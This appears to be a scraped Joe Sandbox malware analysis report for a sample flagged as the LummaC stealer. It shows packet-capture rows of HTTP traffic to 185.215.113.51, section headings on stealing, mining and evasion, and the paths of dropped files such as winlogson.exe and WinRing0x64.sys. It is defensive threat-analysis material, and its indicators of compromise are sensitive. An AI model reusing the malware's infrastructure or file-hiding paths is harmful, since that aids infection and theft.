Mar 13, 2025 13:34:03.983541965 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.983551979 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.983573914 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.983575106 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.983586073 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.983601093 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.983608961 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.983613014 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.983635902 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.983656883 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.983669043 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.983671904 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.983694077 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.983706951 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.983711004 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.983751059 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.983762980 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.983772993 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.983774900 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.983798981 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.983891964 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.983902931 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.983915091 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.983932018 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.983944893 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.983957052 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.983972073 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.983972073 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.983999014 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.984044075 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984057903 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984070063 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984119892 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.984119892 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.984173059 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984184980 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984196901 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984208107 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984217882 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984247923 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.984261036 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.984335899 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984379053 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984390974 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984390974 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.984426975 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984426975 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.984437943 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984456062 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984467983 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984513044 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.984513044 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.984541893 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984555960 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984568119 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984579086 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984590054 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984591961 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.984622955 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.984644890 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984658003 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984671116 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984690905 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984693050 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.984702110 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984733105 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984738111 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.984745026 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984752893 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.984783888 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.984817028 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984827042 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984850883 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984863997 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984873056 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.984880924 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984894037 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984906912 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984918118 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.984936953 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.984946966 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984958887 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984970093 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984982014 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.984993935 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.985013008 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.985028028 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.985033035 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.985054016 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.985063076 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.985066891 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.985093117 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.985104084 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.985141039 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.985152006 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.985166073 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.985188007 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.985189915 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.985199928 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.985260963 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.985275984 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.985276937 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.985292912 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.985305071 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.985320091 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.985348940 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.985371113 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.985383034 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.985394001 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.985414982 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.985426903 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.985438108 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.985438108 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.985450029 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.985469103 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.985498905 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:04.003722906 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:04.003767014 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:04.003772020 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:04.003782988 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:04.003793001 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:04.003815889 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:04.003828049 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:04.003834963 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:04.003837109 CET	49701	80	192.168.2.8	185.215.113.51

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report setupx 1.exe1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Bitcoin Miner

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Dllhost\WinRing0x64.sys

C:\ProgramData\Dllhost\winlogson.exe

C:\ProgramData\HostData\logs.uce

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_setupx 1.exe1.ex_b692906daec281bca74e7bfa93f9f1ed2c1fc_af2557d0_fd0ac405-4335-48d1-8ce2-ed376d339f00\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAD0A.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE43.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE83.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Windows Analysis Report
setupx 1.exe1.exe